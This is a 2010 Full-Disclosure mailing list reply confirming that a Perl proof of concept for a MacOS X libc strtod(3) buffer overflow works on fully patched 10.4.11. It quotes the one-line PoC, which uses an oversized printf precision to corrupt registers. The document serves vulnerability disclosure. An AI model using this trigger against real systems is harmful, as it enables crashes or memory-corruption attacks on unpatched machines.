
Date: Tue, 12 Jan 2010 13:13:22 -0500
From: Joshua Levitsky <jlevitsk@...hie.com>
To: full-disclosure@...ts.grok.org.uk
Subject: 133-54D Re: MacOS X 10.5/10.6 libc/strtod(3)
	buffer overflow

On Tue, Jan 12, 2010 at 12:54 PM, Joshua Levitsky <jlevitsk@...hie.com>wrote:

> On Mon, Jan 11, 2010 at 12:26 PM, Maksymilian Arciemowicz <
> cxib@...urityreason.com> wrote:
>
>>
>
> Could you check perl PoC ?
>> It should overwrite esi and edi register
>>
>> esi=0x41414141
>> edi=15
>>
>>
> The perl PoC worked on 10.4.11 fully patched.
>
> http://securityreason.com/achievement_securityalert/63
>
> Example 0:
> - --- chujwamwmuzg.pl ---
>
> #!/usr/local/bin/perl
> printf "%0.4194310f", 0x0.0x41414141;
> - --- chujwamwmuzg.pl ---
>
> --
Joshua Levitsky, MCSE, CISSP
http://www.jnuxhosting.net
http://www.jnux.net
http://blog.joshie.com/
[5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1]

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
